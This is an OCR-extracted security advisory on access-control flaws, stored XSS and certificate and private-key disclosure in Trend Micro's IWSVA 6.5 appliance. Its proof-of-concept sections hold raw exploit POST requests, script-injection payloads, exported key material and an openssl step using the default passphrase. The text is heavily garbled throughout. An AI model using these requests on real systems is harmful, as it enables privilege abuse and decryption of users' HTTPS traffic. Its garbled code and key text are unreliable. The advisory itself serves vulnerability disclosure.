Qualys Security Advisory QSA-2017-01-12 


January 12, 2017 


Multiple Vulnerabilities in Trend Micro Interscan Web Security Virtual Appliance (IWSVA) 6.5.x 


SYNOPSIS: 


TrendMicro InterScan Web Security Virtual Appliance (IWSVA) does not implement functional level access 
control properly. 


Reference: 


http://downloadcenter.trendmicro.com/?prodid=86&regs=NABU 


http//cve.mitre.org/c gi-bin/c vename.c gi? name=C V E-2017-6338 


http://cve.mitre.or ø/c gi-bin/c vename.c 91? name=C V E-2017-6339 


http://cve.mitre.or ø/c ei-bin/c vename.c ei?name-2C VE-2017-6340 


VULNERABILITY DETAILS: 


Vulnerability 1: Missing functional level access control allows an authenticated user change FTP access 
control setting 


An authenticated, remote user with least privilege/role (a user with ‘Auditor’ role) can change ‘FTP Access 
Control Settings’ to add his own machines IP address into allowed IP addresses list. 


Vulnerable/Tested Version: 


InterScan Web Security Virtual Appliance version IWSVA 6.5-SP2 Critical Patch Build 1739. Older versions 
are also affected. 


É#) TREND. | InterScan* Web Security Virtual Appliance 


System Update: 


Welcome,admin â Log Off | 


System Status Select a Patch to Install 
Dashboard Location: | Choose File | No file chosen [Upload 
+ Application Control 
+ Bandwidth Control Current TWSVA Information 
= Host Name OS Version Application Version Last Updated 
gc TrendMicro1WSVA6.5SP2 3.5.1321.el6.x86_64 6.5-SP2 Build Linux 1739 2/14/17 4:51:25 PM 
* Logs 
Reports - - 
* Updates 
Notifications 
ES 
Ra Deployment Wizardr? 
" /A Config = Application Patches OS Patches 
+ Network Configuration Patch Member Patch Information Installed on v 
POTTER cpb1739 | Uninstall 2/14/17 4:51:25 PM 
Config Backup/Restore Spbi737 IWSVA 6.5-SP2 Critical Patch Build 1737 1/28/17 6:34:55 PM 
Patchi B1707 SEL €:5SE2 EN Bàn 1 Build 1707 10/25/16 10:06:16 PM 
hfb1622 IWSVA 6.5-SP2 Hot Fix Build 1622 10/25/16 9:59:53 PM 
à cpb1620, IWSVA 6.5-SP2 Critical Patch Build 1620 10/25/16 9:55:19 PM 
Product License Spbl608 IWSVA 6.5-SP2 Critical Patch Build 1608 10/25/16 9:44:12 PM 


Risk Factor: Medium 
ct: 


An attacker with read only rights can change ‘FTP Access Control Settings’ by sending a specially crafted 
POST request. 


Proof-Of-Concept: 


1. Create a least privileged user ‘Auditor’ and assign it ‘Auditor’ role. 


(9, TREND | InterScan* Web Security Virtual Appliance 


GER Login Accounts 
Reports Add ff] Delete 
* Updates L] username User Type Rolename Description 
Notifications admin Local MasterAdminRole Master Administrator 
Administration 口 
Audt LOG B | ' En ae 
.....Deployment Wizarde} |[] Auditor Local Auditor AuditorUser 
+ IWSVA Configuration L] bob Local Reports only Bob 
+ Network Configuration L] test2 Local Reports only 
- Management Console 


2. Log into IWSVA web console with least privilege user ‘Auditor’. 


Dashboard 
Password 
* Application Control 
* Bandwidth Control 
* HTTP 


* Updates 
Notifications 


* Administration 


D) TREND. | InterScan™ Web Security Virtual Appliance 


GENUS A oo ot © 


° 


System Status 


HTTP(s) Traffic: o Turn Off 


[IWSVA without DLP] The product has not been activated. 


FTP Access Control Settings 


Concurrent Connection 


Concurrent Connections 


wm 


(® TREND. | InterScan™ Web Security Virtual Appliance Welcome,admin & Loa Oft | @ --------- Halg-—--——- vị 
P sea FTP Access Control 
_ System Status = Client IP «| Approved Server IP List Destination Ports - 
Dashboard 
TP} [V] Enable FTP Access Based On Client IP 
* Bandwidth Control Allow FTP access for 
+ HTTP @ ip address: 
..ScanRules ` e e On iP mask: IP Address mask 
- Configuration Dee ] 
General 2 
Access Control Settings » Add 
Gees TP Address Description Delete 
Reports 
* Updates Save Cancel 


Make sure that you don't have FTP access 


root@kaps-virtual-machine:/# ftp 192.168.253.150 


onnected to 192.168.253.150. 
) does not have access to the IWSVA server.Contact your network administrator. 


421-Your IP ( 


421 Connection rejected 


tp> bye 


Note down ‘CSRFGuardToken’ and ‘JSESSIONID’ values for this session. 


Y Request Headers ew source 
Accept text/html,application/xhtml«xml,application/xml;q-0.9,image/webp,*/*;9-0.8 
Accept-Encoding: gzip, deflate 
Accept-Language: en-US,en;q-0.8 
Cache-Control: max-age=@ 
Connection: keep-alive 
Content-Length: 86 
Content-Type: application/x-www-form-urlencoded 
Cookie: JSESSIONID-,Z£]g ap i 17:1 5) RI E Pes 
Host: 192.168.253.150:1812 
Origin: http://192.168.253.150:1812 
Referer: http://192.168.253.150:1812/password.jsp 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 


Gecko) Chrome/55.0.2883.87 Safari/537.36 


Y Form Data ew source ew URL encodec 


CSRFGuardToken: ESEDAVB7KVDVPEHNCABYXWBESVSTuSEH 


6. Send following POST request using BurpSuite Repeater with *CSRFGuardToken' and ‘JSSESSIONID’ 
values obtained earlier. Follow redirections in BurpSuite to complete the request. 


POST /ftp clientip.]sp HTTP/1.1 
Host: 192.168.253.150:1812 


User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 
. Accept: text/html,application/xhtml4- xml, application/xml;q=0.9,*/*;q=0.8 
. Accept-Language: en-US,en;q=0.5 
. Accept-Encoding: gzip, deflate 
. Referer: http//192.168.253.150:1812/ftp_clientip.jsp 
. Cookie: JSESSIONID=443F 1 AAE87DC29CD98963E03039E9271 


. Connection: close 

. Upgrade-Insecure-Requests: 1 

. Content-Type: application/x-www- form urlencoded 
. Content-Length: 250 


. CSRFGuardToken=ES ED4 V87K WDVPEHWC4B YXW86S V9IW5 EW &op=save &change_op=nocha 
d&daemonaction=8 &input_tips=40+characters+maximuméftp__use_client_acl=yes&use_client_acl_vi 
w=yesdzinp utt ype=ip & ip=192.168.253.133 &desc=Ubuntuc&itemlist=192.168.253.133+%3 BUbuntu 


5. This enables FTP access 


root@kaps-virtual-machine:/# ftp 192.168.253.150 
onnected to 192.168.253.150. 


220 IWSS FTP proxy ready 
ame (192.168.253.150:root): J 


6. Now log into IWSVA web console as admin from another browser and check to see if FTP Access Control 
List has been updated 


*b Security Virtual Appliance Welcome,admin â Loa Off | ÈÄ | --------- Help--------- v 


FTP Access Control 


Client IP ` Approved Server IP List Destination Ports 


Enable FTP Access Based On Client IP 


Allow FTP access for 


(€) iP address: 


i Ow range: from to 
O IP mask: IP Address mask 
‘| | Description |40 characters maximum 
, Add 
Iz — — 
[192.168.253.133 Ubuntu ® 
Save Cancel 


Note: Per #3, the FTP ACL list did not have any IP addresses there but FTP access based on client IP was still 
enabled. In either case, the above request would add an IP address to the list wiping out existing IP address if 


any. 


Vulnerability 2- Stored Cross-Site Scripting (XSS) 


An authenticated, remote attacker can inject a Java script while creating a new report that results in a stored 
cross-site scripting attack. 


Risk Factor: Medium 


Impact: 


An attacker with low privileges can inject malicious Java script by sending a specially crafted POST request to 
add a new user (which he shouldn't be able to as per Vulnerability#1 mentioned above). 


Vulnerable Parameters: - 

a. name 

Note: Other parameters may be vulnerable. 
CVSS Score: AV:N/AC:L/AU:S/C:N/I: P/A:N 


Proof-Of-Concept: 


Create a least privileged user ‘test’ and assign it “Reports Only’ role. 

Log into IWSVA web console with least privilege user ‘test’. 

Note down *CSRFGuardToken' and 'JSESSIONID' values for this session. 

Send following POST requests using BurpSuite Repeater with ‘CSRFGuardToken’ and ‘JSSESSIONID’ 
values obtained earlier. Follow redirections in BurpSuite to complete the request. 


Jobs 


Request: 


POST /rest/commonlog/report/template HTTP/1.1 

Host: 192.168.253.150:1812 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 
Accept: application/json, text/javascript, */*; q=0.01 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Content-Type: application/x-www- form-urlencoded; charset=UTF-8 

X-Requested- With: XMLHttpRequest 

Referer: 
http//192.168.253.150:1812/report_action.jsp?CS RFGuard Token=EPCB6F AIRAK 4393 A74A9S YCRKR2( 
VZM &mode=edit& tid=19b59380-4a41-4134-8 laf-f7e2e6ce06d9 

Content-Length: 88 

Cookie: JSESSIONID=5F8A705062C 1D9C 14B0026F8C89DSCC8 

Connection: close 


{"action":"check_name","name":"TestReportl \<script\>alert(\"Hola Report!\")\</script\>"} 


Request#2: 


POST /rest/commonlo g/report/template HTTP/1.1 


Host: 192.168.253.150:1812 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 
Accept: application/json, text/javascript, */*; q=0.01 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Content-Type: application/x-www- form-urlencoded; charset=UTF-8 

X-Requested- With: XMLHttpRequest 

Referer: 

http//192.168.253.150:1812/report_action.jsp?CS RFGuard Token=EPCB6F AIRAK 4393 A74A9S YCRKR2( 
VZM &mode=edit& tid=19b59380-4a41-4134-8 laf-f7e2e6ce06d9 

Content-Length: 3041 

Cookie: JSESSIONID=5F8A705062C 1D9C14B0026F8C89DSCC8 

Connection: close 


( "action" :" modify", "tid": 19b59380-4a41-4134-81af-f7e2e6ce06d9 ", "template " : { "tid":"19b59380-4a41-41 
8 laf-f7e2e6ce06d9", "name ":" TestReportl\<script> alert(V'Hola 

Report! V) M/script'o ", "description" :" "enable ":true, "period" :" ID", "from" :-2209096400, "to ":- 
2209096400,"frequenc y”:0, "scheduled" :false, "start_date":148 1060520, "runtime ":"0:0:0","max exec numbq 
:0, type ":"PDF","list number":10," mail enable "false "ma from":" "mail to":[""], "subject ":"", "message 
" mail attach":false,"fail notice ":false, "fail mail to":[""], report by":O, "report by list":(), "reports ":( "int 
net security ":[['top malware spyware. detection",10,true,[0]], ['top botnet detection", 10,true,[O ]],["top. ad 
nced threats detection", IO. pue IO (rop custom defense apt blocking",10,true,[0]], ['c&c contact alert 
unt by date" O,true,[0]],["top c&c contact ip domains ",10,true,[0]],["top users hosts detected by c&c . 
ntact. alert", 10,true,[0 ]].["top. groups detected by c&c contact alert",10,true,[0]],[ top. malicious sites b 
cked",10,true,[0]],["top. users blocked by malware spyware ",10,true,[0]]. [top users blocked by. maliciq 
s sites", 1O,true,[0]].[ top groups blocked by malware spyware",10,true,[0]].["top groups blocked by. 
icious site", 10,true,[O]],["top users by bot net detection", 10,true, [0]],["most violation for http malware 
can policy" O,true,[0]],[ malicious sites blocked by date",O,true,[2]],[ malware spyware detection by. d 
"O,true,[2]],['malware spyware. detection trend",O,true,[3]]], "internet access":[["top applications visited! 
O,true,[0]],['top url categories visited", 10,true,[O]].[ top sites visited", 10,true,[O]],[ top. users by. reques 
,l0,.true,[0]], [top groups by. requests ",10,true,[0] ],[ top url categories by browse. time”, I0,true,[0]],[ "to 
sites visited by browse time",10,true,[0]],['top users by browse time",10,true,[0]],["activity level by d 
s",0,true,[5]]], "bandwidth":[["top. url categories by bandwidth",10,true, [0]], ["top. applications by bandw 
h^10,true,[0]], [top users by bandwidth",10,true,[0]],[ top groups by bandwidth",10,true,[0] ],["top. sites 
by bandwidth ",10,true,[0 ]].[ total traffic by days",0,true, [3]]], "policy. enforcement" [["top url categories 
locked", 10,true,[0]].[ top applications blocked",10,true,[0]],[ top. users enforced ",10,.true,[0] .[ top. groug 
enforced", 10,true, [0]], ['top. sites blocked", 10,true, [0]],["top users by http inspection", 10,true,[0] ], [ " most 
lolaton for url filtering_policy”,0,true, [0]], ['most. violation for application control po licy",0,true,[0]],[' 
ost violation for access quota control policy",O,true,[0]],.["most. violation for applets and activex pol 
"O,true,[0]],["most violation for http inspection policy" mue IO, "data security" :[["top. dlp templates 
locked by. requests ", 10,true,[2] .[ top blocked users",10,true,[0]],[ top blocked groups",10,true,[0 ]].[" 

. violation for data loss prevention policy",0,true,[0]]], custom reports":[]), "last. gen time":1481103598 
current, exec. time":1, "scheduled time filter”:"0", "device group ":"","last update by":"test2"]) 


5. Any user visiting 'reports.jsp' and 'show auditlog.jsp' pages will see alert 'Hola Report!': 


J TREND. | InterScan* Web Security Virtual Appliance Welcome,test2 đồ Loa off | E) 


P Search 


System Status 
Dashboard 


Password 


Delete 


* Logs 


Message from webpage X 


Lt Hola Report! 


TREND. | InterScan" Web Security Virtual Appliance Welcome,test2 đề Loa Off | 

® Search Reports 

Sun sae [88 Add [$] Conv fil} Delete 

Dashboard - 

= S [C] Report Name Period Generate Report Saved Reports 

'asswort 
Prem [] Y restRep Last 1 Day(s) Run Now Thursday 01 Dec 2016 16:45 IST 
S Y tentaron = Pes adnede 07 Du 2016 19:09 15r 


Hola Report! 


m 


Audit Log: 


€ 0 192.168.253.150:1812/show_auditlog.jsp x @ Q Search wii 


INT vị e @ SQL- XSS- Encryptiony Encodingy Other- 


局 Load URL 
Q Split URL 
+; Execute 


器 Enable Post data  [ ] Enable Referrer 


Hola Report! 
C Preventthis page from creating additional dialogs 


[s 


Vulnerability 3- Missing functional level access control allows an Auditor user modify existing reports or 
create new one, thus can exploit Stored Cross-Site Scripting vulnerability mentioned above. 


An authenticated, remote attacker with ‘Auditor’ role assigned to him/her, can modify existing reports or create 
a new one. This user can also exploit the stored cross-site scripting vulnerability mentioned above. 


Risk Factor: Medium 


Impact: 


An attacker with low privileges can create/modify reports and inject malicious Java script by sending a specially 
crafted POST request. 


Vulnerable Parameters: - 

b. name 

Note: Other parameters may be vulnerable. 
CVSS Score: AV:N/AC:L/AU:S/C:N/I: P/A:N 


Proof-Of-Concept: 


Create a least privileged user ‘Auditor’ and assign it ‘Auditor’ role. 

Log into IWSVA web console with least privilege user ‘Auditor’. 

Note down *CSRFGuardToken' and 'JSESSIONID' values for this session. 

Send following POST requests using BurpSuite Repeater with ‘CSRFGuardToken’ and ‘JSSESSIONID’ 
values obtained earlier. Follow redirections in BurpSuite to complete the request. 


Te cp 


Request: 


POST /rest/commonlo g/report/template HTTP/1.1 

Host: 192.168.253.150:1812 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 
Accept: application/json, text/javascript, */*; q=0.01 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Content-Type: application/x-www- form-urlencoded; charset=UTF-8 

X-Requested- With: XMLHttpRequest 

Referer: 

http//192.168.253.150:1812/report_action.jsp?CS RFGuard Token=5 XODT278I1J9 V ZJ4PHU U2PJVPCGS 
YP&mode=add 

Content-Length: 92 

Cookie: JSESSIONID=E7002FCE8A03291749B 144954 1B9844C 

Connection: close 


{"action":"check_name","name":"AuditorsReport\<script\>alert(\"Hola Auditor!\")\</script\>"} 


Request#2: 


POST /rest/commonlo g/report/template HTTP/1.1 

Host: 192.168.253.150:1812 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 
Accept: application/json, text/javascript, */*; q=0.01 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Content-Type: application/x-www- form urlencoded; charset=UTF-8 

X-Requested- With: XMLHttpRequest 

Referer: 

http//192.168.253.150:1812/report_action.jsp?CS RFGuard Token=5 XODT278I1J9 V ZJ4PHU U2PJVPCGS 
YP&mode=add 

Content-Length: 2877 

Cookie: JSESSIONID=E7002FCE8A03291749B 144954 1B9844C 

Connection: close 


{''action'':''add",,"template":{"reports":{"internet_security":[["top_malware_spyware_detection", 10,true,[( 
,["top_botnet_detection",10,true, [0]], ["top_advanced_threats_detection",10,true,[0]],["top_custom_defense 
t_blocking",10,true,[0]],["c&c_contact_alert_count_by_date",0,true,[0]],["top_c&c_contact_ip_domains",1( 
ue,[0]],['top users hosts detected by c&c contact alert",10,true,[0]], ['top. groups detected by c&c co 
ct. alert", 10,true, [0]], [top malicious sites blocked",10,true,[0]],["top. users blocked, by. malware spywa 
,lO0,.true,[0]], [top users blocked by malicious sites", 10,true,[0]],["top groups blocked by malware sp 
re",10,true,[0]].['top groups blocked by malicious site”, IO. pue, [0]],["top users by bot net detection",l 
rue,[0]],["most violation for http malware scan policy",O,true,[0]],[ "malicious sites blocked by date ",0 
ue,[2]],[ "malware spyware detection by. date ",O,true,[2]], ["'malware spyware detection trend ”,0,true,[3 |] 
internet access ":[["top. applications visited", 10,true,[0]].[ "top. url categories visited ", 10,true,[O ]].[ "top. si 
visited ,10,true,[0]].[ "top users by requests" ,10,true, [0]], [top groups by requests",10,true,[O]].[ top. ur 
categories by browse time",10,true,[0]].["top sites visited by browse time",10,true,[0]],["top. users by 
owse time", 10,true,[0]],['activity level by. days",O,true,[5]]], bandwidth”:[[”top_ url categories by band 
th", 10,true,[0 ]].[ top. applications by. bandwidth", 10,true,[0] rop users by. band width",10,true,[0]].[ "tog 
groups by. bandwidth", 10,true,[0] ],["top. sites by bandwidth",10,true,[0]]. ["total traffic by. days ",0,true,[ 
],'policy enforcement":[["top url categories blocked",10,true,[0]]. [top applications blocked ,10,true,[0] 
"top users enforced", 10,true, [0]], [top groups enforced", 10,true,[0] .[ top. sites blocked ",10,true,[0]].["ta 
users by http inspection",10,true,[0]].["most violation for url filtering policy",O,true,[0]], ["most, violatiq 
.for application control policy" O,true,[0]],["most violation for access quota control policy ",O,true, [0]], 
most, violation for applets and activex policy" O,true,[0]].[ "most violation for http inspection policy", 
ue,[0]]], data security":[["top dlp templates blocked by requests ",10,true, [2]], [top blocked users",10, 
›[O]I.[ top_blocked_ groups ",10,true,[0]].[" most violation for data loss prevention policy" ,0,true,[0]]]. "c 
om reports":[]}, "mail to":[""], "fail mail to":[""], "description": "","name ":"AuditorsReportWsscript ale 
"Hola 

Audifor†V'")\</seripf\> ", "enable ":true, "frequency" 0, "scheduled ":false, "start date":1484170920, "runtime ":' 
3:12","max exec number" 0, "period ": "1 D","from":1484159400, "to" :1484245800, "scheduled time filter 
,device group ":"", "type": "PDF","list number":10," mail enable" false," mail from":" ", "subject" :" ","messag 
;” "mall_attach":false, "Tal notice ":false, "report by. "report by. Iist”:{} }} 


Note: An existing report can be modified by setting *action":" modify" and providing an appropriate report and 
template *tid". 


5. Any user visiting 'reports.jsp' and 'show auditlog.jsp' pages will see alert "Hola Auditor!': 


Hola Auditor! 


© 192.168.253.150:1812/show_auditlog.jsp X @ Q Search 


= @ SQL- XSS- Encryption- Encoding” Other- 


[C Enable Post data  [ ] Enable Referrer 


Vulnerability 4- Sensitive Information Disclosure: 


An authenticated, remote attacker with least privileges (“Read-Only’ or ‘Auditor’ role assigned to him/her), can 
download HTTPS Decryption certificate and private key. 


Risk Factor: High 


Impact: 


Per IWSVA documentation, by default, IWSVA acts as a private Certificate Authority (CA) and dynamically 
generates digital certificates that are sent to client browsers to complete a secure passage for HTTPS 
connections. It also allows administrators to upload their own certificates signed by root CA. An attacker with 
low privileges can download current CA certificate and Private Key (either the default ones or uploaded by 
administrators) and use those to decrypt HTTPS traffic thus compromising confidentiality. 


Also, the default Private Key on this appliance is encrypted with very weak and guessable passphrase ‘trend’. If 
an appliance uses default Certificate and Private Key provided by Trend Micro, an attacker can simply 
download these and decrypt the Private Key using default passphrase ‘trend’. 


CVSS Score: AV:N/AC:L/AU:S/C: C/I:C/A:N 


Proof-Of-Concept: 


Create a least privileged user "Test?" and assign him either ‘Auditor’ or ‘Reports Only’ role. 

Log into IWSVA web console with least privilege user “Test2'. 

Note down ‘CSRFGuardToken’ and 'JSESSIONID' values for this session. 

Send following POST requests using BurpSuite Repeater with ‘CSRFGuardToken’ and ‘JSSESSIONID’ 
values obtained earlier. Follow redirections in BurpSuite to complete the request. 


Tow dp 


Request#1: 


POST /servlet/com. trend. iwss. gui.servlet.XMLRPCcert?action=exportcert HTTP/1.1 
Host: 192.168.253.150:1812 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 
Accept: text/html,application/xhtml+ xml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Cookie: JSESSIONID=564D4B2C0A9DEIB0700F9E0A19BFBFSS 

Connection: close 

Upgrade-Insecure-Requests: 1 

Content-Type: application/x-www- form- urle ncoded 

Content-Length: 147 


CSRFGuardToken-RHPK4UQ EZB U6G6GVOB X9D YA2NLD3WPFW &op=save &defaultca=no &importca 
certificate=&importca_key=&importca_passphrase=&importca_2passphrase= 


Request#2: 


POST /servlet/com. trend. iwss. guiservlet.XMLRPCcert?action=exportkey HTTP/1.1 


Host: 192.168.253.150:1812 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 
Accept: text/html,application/xhtml+ xml, application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Cookie: JSESSIONID=564D4B2COA9DE1 BO700F9E0 A19BFBF58 


Connection: close 

Upgrade-Insecure-Requests: 1 

Content-Type: application/x-www- forn urlencoded 
Content-Length: 147 


CSRFGuardToken-RHPK4UQ EZBU6G6GVO0OB X9D YA2NLD3WPFW &op=save &defaultca=no &importc4 
certificate=&importca_key=&importca_passphrase=&importca_2passphrase= 


5. The first request downloads CA Certificate ‘get_current_ca_cert.cer’ and the second one downloads Private 
Key ‘get_current_ca_key.cer’. 


CA Certificate 


MIID4TCCAsmgA wIBA glJ ALS+n7 I0woMsM A0GCSqGSIb3 DQEBBQUAME4 xC zAJBgNV 
BAgTAKNBMQswCQ YDVQQHEwJD VTEOM AwGAI UEChMFVFJFTkQxDTALBgNVBASTBEIX 
UIMxEzARB gNVBAMTCKIXU1 MuVFJFTkQwHhcN MDgxM TIXMDc wOTIOW hcNMj gxM TE2 
MDcwOTIOWjBOMQswCQ YDVQQIEwJ DOTELM AkGA1UEBxMCQ1UxDjJAMBgN VBAoTBVRS 
RUSEMQOwCwYDVQQLEwRJ VINTMRMwEQYDVQQDEwpJV INTLIRS RUS EMIIBIj ANBgkq 
hkiG9Ow0BAQEFAAOCAQS8AMIIBCgKCAQEApucvwAB50 AzgiboEaxrV ZXptpOLSjrL6 
/BSCOTNK59obTuleITGV sm90 g2Hj/b3 wZpxWZCKIyECP zk6Q vf TbpH5 29 ZtZ+6bn 
7D0lbxLk4Ax/mxZMY4tdGtBLx2gQMp69PfoYteb6I9hvJJ9vlCQ2Wqo7Lc0fXO+l 

S9L+R032LS yuTwt2iB VY ym7rXq XKFme6fbk 1 q/68qWp8 fhX+F9c x8JQ yDQLOwRS U 
QEGd085LeH6NdEhn9N AC 9 y XyIQSbORm0 yc/od y2w XIOTV fuOcBQ f8 tUMLrO nlt4 
v6C033JipcJISNccH0zli6/D5+ UfXw50G/18 LsHfoht YFw+xFqc7 uQIDAQA Bo4 HB 

MIG+MA8GC WCGSAGG+EIBDQQCFgAwHQ Y DVROOBBYEFLDosmmRcl0VrT8/0j+hGLg 
CpgFMH4GA1UdIwR3MHWAFLDosmmRcl0VrT8/0j+hGLgCp gFo VKKUDBOMQswCQ YD 
VQQIEwJDQTELMAKGA1 UEBXMCQIUxDjAMBgN VB Ao TB VRSRUSEMQOwCw YD VQQLEwRJ 
VINTMRMWEQ YDVQQDEwpJV1INTLIRSRUS EggkAtL6fsjTC gywwDA YD VROTBA UwAwEB 
/ZAN BgkghkiG9 wWOBAQUFAAOCAQEAoh0 XZ8 zQ ZKswjEsV gDrfuJWXQ7KvP XBaHW+1 

vAzq3JS6IL6 TN 6mS tq u36 wEpjf4 UfK nn7 Tp V EBPB6kjGe Zak+O ZiPa0sojqk grOQ 

OvUV2pi4fD A vCcxhsIgZ8W Xe XEMb+C frOSEBsd72sxK BtJ2iK LK H6NFqrWCBS tJ B 

3IIEfWzgp0N zqS+r2 yRPpFv8F+ VXRC mmK W3SkHRisz9iOAF+ VQO+8RynHCW8FWN4 
YGVSsTTjx8 E08acrazCM+t9GamBCsUi12 g3qcnSZMQ IsLrWehYN3 fBneNsltzik8R 

Im9/tIVA4D/P xeFN IS IZHZmcpX REckIk gZeq g3 upP+ DGI2 IM Dw== 


Encrypted Private Key 


Proc- Type: 4,ENCRYPTED 
DEK-Info: DES-EDE3-CBC,28B568992A78D7DB 


OKOn5rhcUifRBW HfAJtGP 1K7U Y n4 Y E7nttnW hLeUX gS mX Rb8D+qBfmfkNb9I3q Y 
QMalv/ymEl68F wvHuU V62C IYohhe8ZtB7fRLrc210 XEGne Yd9zij TuRbIDuHMU B 
ff2ykxzxaBee ylIBe CN Me+XM0dzDIV6BM7JanczQpcbodopDvCX3 yS uQpD Uw8QP vw 
fikkfdhbSEK dNv8 1 NJrrQcIBK wfIYFoq4ImAp vRIAG8Jhl q1 mX/78dJ Ya577FRYb 
q5wwMM92s175s1vZuLTQ Vt3+u0 hdf4 Aly z2cdDgV/ezgfeNtw/]5s9dJOX XDyLk4O 
wxyNdYC9wdxMYW ZcvLOjBtetgXHNOtx/fkd--kpOpflexc GRRX YfxN19GK lIAMri2C 
pnJ7I19nXG/cvJOj2O mzLxO vOtxy V8Cc5jfHeD wimY V BpshQrB8 B4 vH4c/1zgDbz 
scxGM/KuldAJW3 IsJbOFEdeJ80Z/ eoBL/0/F2 luo--PdJmi3SKbACZ8hp7Hxv3S KO 
IxHSxFZXDzG5RXR/N IflrU/susDxPRBUscot2A2jJIu3fGm3CJ vId/yj 1 CZMJgy4 
GsZQRfRzdEr0p YaBSQDy Vtv20IO vO3qL/seK FSsMIzuIl9F2k HP455J5CgXIN uV8sy 
IfbvqiL2Zj EozHulX4uPVsK H: BiAapghunUoODttx2jdh/xI8J5 fOrxTHdY snehX 
yig3zYL9Bwcds Ayv23 ylyl p5qcjighBM2pN IkcnV4pgDZCO h3TbUy2tErIn0zHO1 
cpnfArCr+UBde8 nEdEerqjuip lw6HFc7PP gjl ggO Lr6N052cN8fhXjK nK XaCcTRP 
oOL0+mWbh+xn/O7dxPbPBP7IMUrNxC x1 zH2pMa2 VHvDESEDAP Y15 VsgunQcG3 yn/ 
DNpVavQ0MDpx23Hi8 AcA1fwdoJzc+wfMO9E1A0IK+st7ELToMJhi0eQvT]S0Z2D 
4p8aLd5JMQty zlfoK MiGV gloQtkA49 EFld Bv3 RRMHAZUS g9 XmxK5 Uzv8kw Y6iX xh 
u2yj9sFxXHqbBBGNjxaRBS5 hLstSrDU vIDuoUC6225XaBCD9 VIlpXg5Cok54JPT2 VRT 
Odjb36MGM+bAEN XmxeS59fqsp xpdmoFaCMI17 zPf4J76K Ai5MUhY V gl okve4/b AHb 
IpxEYG4br7cDpRJC U8 io/XaNjcqsJb gUS WK519 yKkKVNsEOW4 vBKUPsL/D E6/1K mn 
EiK/58XTv2inS4brMO ICjULjx6y XW X v8n8 Yad+c92 sj Danf5 w7/TnAKRDerrRvI7 
Vv8G92kAzzfNQhUEhfq6iMUGZcFx64-Gte226ga52iaLDAachDvb7nV0QQJjl5 LoUu 
9nYVc5MO9ytWvLxV HF6fjRHKW8bno7UISU78PdAQJuzAtI92sSHGNGTDxYS5 EGut8Jq9 
60Rjc+CSd+XZK WnZLA znyjcMdqjc D8tohLUDO V mEar1 3elo3 IlelbO OnOBgdt TT8N 
6AfW YOjyOqdoA95L/NiLbdnp0W Zudi4K S YdJO gloo9btahizjOEA fuG83QqTrJ YO 

[EK YbJmlaT3E7F4V qRM vXJ7syWpZWooc5iYrcb3DIhXZkfcC X5P6DhDbOXzHYFan 


6. Decrypt the Private Key using passphrase ‘trend’ 


root@kali: - 


File Edit View Search Terminal Help 
:~/Desktop/TrendMicro# openssl rsa -in get current ca key\(1\).cer out decrypt priv.key 
Enter pass phrase for get current ca key(1).cer: 
riting RSA key 


:~/Desktop/TrendMicro# B 


7. To confirm if the certificate and private key match, use SSLHopper Certificate Key Matcher: 


Enter your Certificate: 
SSL*RO2LSyuTwiZIBVYym7rXgXKEme6fbk1g/68gWpBIhX* FScxSIQyDQLOwRSU p Othe n and private key 
match: 


QEGdOBSLeHeNdEhn9NACISyXylQSbORmOyc/ody2wXIOTVfuOcBOfBrUMLrOnltA 
§C033|ipcJISNccH0zli6/D5+LIfXw5oG/i8LsHfoh:YFav+xFac7uQIDAQABo4H8 
MIG*MABGCWCGSAGG*EIBDOOCFgAwHOYDVROOBBYEFLDosmmRcIOVrTE/jDj*hGLg 
CpgEMHAGA1UdIwR2MHWAFLDosmmhRCcIOVrT&/jDj*hGLeCpsFoVKkUDBOMQswCOYD 
VQQIEW|DQTELMAkGA 1UEBxMCQ1UxDjAMBgNVBAoTBVRSRUSEMQOwCwYDV. Ri O key Modulus Hash: 


VINIMRMwEQYDVQQDEwpIVINTLIRSRUSEgEkAtLefs|TCEywwDAYDVROTBAUWwAWEB 7bb6b6de9c30fd969c5ad555e4939898 
/ZANBekghkiGSwOBAQUEAA' EAoh0XZ8zQZKswjEsV/ XQ7KvPXBaHW+l 


eo Certificate Modulus Hash: 
7bb6b6de9c30fd969c5ad555e4939898 


vAzg3[SeILeTNemStgu36wEpjfAUfKnn7TpVEBPB6ekjGeZak* OZiPaO0sojgkgrOQ 
ØvUV2pi4fDAvC: EMb+CfrO5EBsd72sxKB:|2iKLKHENFarWCBSt|B 


3IIEAWzEpDNzgS+r2yRPpFv8E+VXRCmmkKW3SkHRisz3iOAF+VQO+8RynHCWSPWN4 
YGVSsTTixBEOBacrazCM «t9GamBCsUi2g3genSZMQlsLrWeh YN2fBneNsltzikBR 


ImS9/tiV44D/PxeFNISIZHZmcpXREcklkeZegg3upP* DGI2IMDw-- 
一 -END CERTIFICATE—-- 


Enter your Private Key: 


—-BEGIN RSA PRIVATE KEY---- 
MIIEpAIBAAK BSOAzgiboEax 0LSirL 6/BSC0TNKSSobTule 


User Ad Your private key is intended to remain 
Tung REES an El EE eeler on the server. While we try to make this 
Be EE Deet process as secure as possible by using SSL 
SURREAL non Eeer lies to encrypt the key when it is sent to the 
